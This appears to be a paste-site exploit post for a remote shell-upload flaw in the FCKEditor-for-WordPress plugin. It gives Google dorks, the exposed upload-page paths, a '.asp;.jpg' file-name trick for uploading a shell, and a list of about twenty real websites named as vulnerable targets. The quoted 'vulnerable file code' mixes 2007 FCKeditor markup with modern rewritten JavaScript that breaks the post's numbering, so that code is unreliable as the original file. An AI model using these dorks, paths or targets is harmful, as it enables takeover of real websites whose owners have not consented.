KingSkrupellos

WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Shell Upload

Dec 19th, 2018
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 20/12/2018
  6. # Vendor Homepage : wordpress.org/support/plugin/fckeditor-for-wordpress-plugin
  7. # Software Download Link : github.com/kcloze/kcloze-blog/archive/master.zip
  8. + github.com/kcloze/kcloze-blog/tree/master/wp-content/plugins/fckeditor-for-wordpress-plugin
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : 2.0 ~ 2.2 ~ 2.6.2 ~ 2.8.4 ~ 3.3.1
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/plugins/fckeditor-for-wordpress-plugin/''
  14. + intext:''DESIGN BY PURR.''
  15. + intext:''powered by WordPress. InBiz theme made it free by desain web. Hosting by rozhled.cz''
  16. + intext:''Site entraîné par WordPress | Connexion | Flux (RSS) des articles | Thème Arthemia de Michael Jubel | Stats''
  17. + intext:''designed by Portland Web Design''
  18. + intext:''© 2009 websitemagix.com powered by fotomagix''
  19. + intext:''powered by fotomagix''
  20. + intext:''realizace webu: Pavel Gloss''
  21. + intext:''© 2008 - 2018 Heather Richards Live | All Rights Reserved.''
  22. + intext:''Powered by WordPress ( WordPress Deutschland ) - Handcoded by Tommaso Baldovino -
  23. German translation and modification by Schwarze Dame''
  24. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  25. + CWE-434: Unrestricted Upload of File with Dangerous Type
  26. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
  27.  
  28. #################################################################################################
  29.  
  30. # Exploit :
  31.  
  32. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  33.  
  34. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
  35.  
  36. /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/frmupload.html
  37.  
  38. /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/browser.html
  39.  
  40. # Directory File Path :
  41.  
  42. /wp-content/uploads/.....
  43.  
  44. /wp-content/uploads/[YEAR]/[MONTH]/......
  45.  
  46. #################################################################################################
  47.  
  48. # Note : Select PHP extension and then Try to upload as .asp;.jpg filename shell extension.
  49.  
  50. # Note : This plugin (fckeditor-for-wordpress-plugin) contains a very serious vulnerability that allows an attacker to gain full control –
  51.  
  52. modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website,
  53.  
  54. a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory.
  55.  
  56. #################################################################################################
  57.  
  58. Vulnerable File Code => /uploadtest.html
  59.  
  60. *************************************
  61.  
  62. <!--
  63. * FCKeditor - The text editor for Internet - http://www.fckeditor.net
  64. * Copyright (C) 2003-2007 Frederico Caldeira Knabben
  65. *
  66. * == BEGIN LICENSE ==
  67. *
  68. * Licensed under the terms of any of the following licenses at your
  69. * choice:
  70. *
  71. * - GNU General Public License Version 2 or later (the "GPL")
  72. * http://www.gnu.org/licenses/gpl.html
  73. *
  74. * - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
  75. * http://www.gnu.org/licenses/lgpl.html
  76. *
  77. * - Mozilla Public License Version 1.1 or later (the "MPL")
  78. * http://www.mozilla.org/MPL/MPL-1.1.html
  79. *
  80. * == END LICENSE ==
  81. *
  82. * Test page for the "File Uploaders".
  83. -->
  84. <html>
  85. <head>
  86. <title>FCKeditor - Uploaders Tests</title>
  87. <script type="text/javascript">
  88.  
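  /**
   * Post the file chosen in the #frmUpload form to the selected uploader connector.
   *
   * This page is the editor's developer test harness (see the file header comment);
   * it drives the server-side upload connectors directly, so it exposes the same
   * endpoints the editor uses. The uploader URL comes from the #cmbUploaderUrl select
   * and, when the "(Custom)" option (empty value) is chosen, from the #txtCustomUrl
   * text box. With neither set, an alert is shown and nothing is submitted.
   * The optional resource type from #cmbType is appended as a ?Type= query parameter.
   * The form targets the UploadWindow iframe; the connector's reply is expected to
   * call OnUploadCompleted from that frame.
   *
   * @returns {undefined}
   */
  function SendFile()
  {
    // Look elements up explicitly instead of relying on named-element globals
    // (cmbUploaderUrl, eURL, ...), which only some browsers expose.
    const byId = ( id ) => document.getElementById( id ) ;

    let sUploaderUrl = byId( 'cmbUploaderUrl' ).value ;

    // The "(Custom)" option has an empty value: fall back to the hand-typed URL.
    if ( sUploaderUrl.length === 0 )
      sUploaderUrl = byId( 'txtCustomUrl' ).value ;

    if ( sUploaderUrl.length === 0 )
    {
      alert( 'Please provide your custom URL or select a default one' ) ;
      return ;
    }

    // The custom URL is free text typed by the user: render it as text, never as
    // markup, so a pasted value cannot inject elements into this page.
    byId( 'eURL' ).textContent = sUploaderUrl ;
    byId( 'txtUrl' ).value = '' ;

    const frmUpload = byId( 'frmUpload' ) ;
    const sType = byId( 'cmbType' ).value ;

    // Assign first, then append: reading .action back yields the resolved URL on a
    // real form element, which is what the original sequence relied on.
    frmUpload.action = sUploaderUrl ;
    if ( sType ) {
      // Encode the type so the query string stays well-formed even if an option
      // value ever carries reserved characters.
      frmUpload.action = frmUpload.action + '?Type=' + encodeURIComponent( sType ) ;
    }
    frmUpload.submit() ;
  }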
  111.  
  /**
   * Callback invoked by the upload connector (from the UploadWindow iframe)
   * once a file upload has finished.
   *
   * Codes 0, 10 and 201 store fileUrl in the read-only #txtUrl box; every code
   * also produces an alert describing the outcome. Unknown codes fall through
   * to a generic message that echoes the code.
   *
   * @param {number} errorNumber - connector result code (0 = success)
   * @param {string} fileUrl - URL of the stored file, when one exists
   * @param {string} fileName - final name of the stored file (used for code 201)
   * @param {string} customMsg - server-supplied text for codes 1 and 10
   * @returns {undefined}
   */
  function OnUploadCompleted( errorNumber, fileUrl, fileName, customMsg )
  {
    // Publish the uploaded file's URL in the txtUrl box.
    const showUrl = () => { txtUrl.value = fileUrl ; } ;

    // A Map (not a plain object) keeps the strict-equality matching of a
    // switch statement: the string "0" and the number 0 are distinct keys.
    const handlers = new Map( [
      [ 0, () => {   // success
        showUrl() ;
        alert( 'File uploaded with no errors' ) ;
      } ],
      [ 1, () => {   // server-defined error, text supplied by the connector
        alert( customMsg ) ;
      } ],
      [ 10, () => {  // server-defined warning: file stored, message attached
        showUrl() ;
        alert( customMsg ) ;
      } ],
      [ 201, () => { // name collision, the connector renamed the file
        showUrl() ;
        alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
      } ],
      [ 202, () => {
        alert( 'Invalid file' ) ;
      } ],
      [ 203, () => {
        alert( "Security error. You probably don't have enough permissions to upload. Please check your server." ) ;
      } ],
    ] ) ;

    const handler = handlers.get( errorNumber ) ;
    if ( handler ) {
      handler() ;
    } else {
      alert( 'Error on file upload. Error number: ' + errorNumber ) ;
    }
  }
  142.  
  143. </script>
  144. </head>
  145. <body>
  146. <table cellSpacing="0" cellPadding="0" width="100%" border="0" height="100%">
  147. <tr>
  148. <td>
  149. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  150. <tr>
  151. <td nowrap>
  152. Select the "File Uploader" to use:<br>
  153. <select id="cmbUploaderUrl">
  154. <option selected value="asp/upload.asp">ASP</option>
  155. <option value="aspx/upload.aspx">ASP.Net</option>
  156. <option value="cfm/upload.cfm">ColdFusion</option>
  157. <option value="lasso/upload.lasso">Lasso</option>
  158. <option value="perl/upload.cgi">Perl</option>
  159. <option value="php/upload.php">PHP</option>
  160. <option value="py/upload.py">Python</option>
  161. <option value="">(Custom)</option>
  162. </select>
  163. </td>
  164. <td>
  165. Resource Type<br />
  166. <select id="cmbType" name="cmbType">
  167. <option value="">None</option>
  168. <option value="File">File</option>
  169. <option value="Image">Image</option>
  170. <option value="Flash">Flash</option>
  171. <option value="Media">Media</option>
  172. <option value="Invalid">Invalid Type (for testing)</option>
  173. </select>
  174. </td>
  175. <td nowrap>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  176. <td width="100%">
  177. Custom Uploader URL:<BR>
  178. <input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled type="text">
  179. </td>
  180. </tr>
  181. </table>
  182. <br>
  183. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  184. <tr>
  185. <td noWrap>
  186. <form id="frmUpload" target="UploadWindow" enctype="multipart/form-data" action="" method="post">
  187. Upload a new file:<br>
  188. <input type="file" name="NewFile"><br>
  189. <input type="button" value="Send it to the Server" onclick="SendFile();">
  190. </form>
  191. </td>
  192. <td style="WIDTH: 16px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  193. <td vAlign="top" width="100%">
  194. Uploaded File URL:<br>
  195. <INPUT id="txtUrl" style="WIDTH: 100%" readonly type="text">
  196. </td>
  197. </tr>
  198. </table>
  199. <br>
  200. Post URL: <span id="eURL">&nbsp;</span>
  201. </td>
  202. </tr>
  203. <tr>
  204. <td height="100%">
  205. <iframe name="UploadWindow" width="100%" height="100%" src="javascript:void(0)"></iframe>
  206. </td>
  207. </tr>
  208. </table>
  209. </body>
  210. </html>
  211.  
  212. #################################################################################################
  213.  
  214. # Example Vulnerable Sites =>
  215.  
  216. [+] steamykitchen.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  217.  
  218. [+] n-vac.co.jp/tool/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  219.  
  220. [+] senftenberg.cz/wordpress/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  221.  
  222. [+] ville-rochefortdugard.fr/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  223.  
  224. [+] jalak.eu/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  225.  
  226. [+] carolwhitemarketing.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  227.  
  228. [+] etkingrup.com.tr/haber/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  229.  
  230. [+] zohnertheater.ch/amberroad/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  231.  
  232. [+] gialongvn.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  233.  
  234. [+] websitemagix.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  235.  
  236. [+] taiyaki-ya.com/wp/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  237.  
  238. [+] locthanhphat.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  239.  
  240. [+] zko157.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  241.  
  242. [+] duolongo.se/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  243.  
  244. [+] sof.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  245.  
  246. [+] heatherrichardslive.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  247.  
  248. [+] textmah.com/sites/zane/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  249.  
  250. [+] nongngucolam.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  251.  
  252. [+] drogy-sos.sk/photoland/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  253.  
  254. [+] kukk.de/affiliateblog/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  255.  
  256. [+] nttprov.go.id/penghubung/web/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  257.  
  258. #################################################################################################
  259.  
  260. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  261.  
  262. #################################################################################################